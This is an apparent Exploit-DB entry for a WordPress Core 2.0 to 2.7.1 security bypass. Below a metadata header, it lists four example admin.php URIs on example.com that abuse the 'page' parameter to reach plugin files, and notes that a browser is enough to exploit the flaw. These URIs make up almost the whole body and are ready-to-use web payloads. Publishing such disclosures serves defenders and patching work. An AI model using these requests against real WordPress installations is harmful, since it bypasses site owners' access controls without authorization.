WordPress Core 2.0 < 2.7.1 - 'admin.php' Module Configuration Security Bypass

Author: Fernando Arnaboldi
type: webapps
platform: php
port: 
date_added: 2009-11-09 
date_updated: 2017-05-04 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comWordPress-2.7.1.zip

An attacker can exploit this issue via a browser.

The following example URIs are available:

http://www.example.com/wp-admin/admin.php?page=/collapsing-archives/options.txt
http://www.example.com/wp-admin/admin.php?page=akismet/readme.txt
http://www.example.com/wp-admin/admin.php?page=related-ways-to-take-action/options.php
http://www.example.com/wp-admin/admin.php?page=wp-security-scan/securityscan.php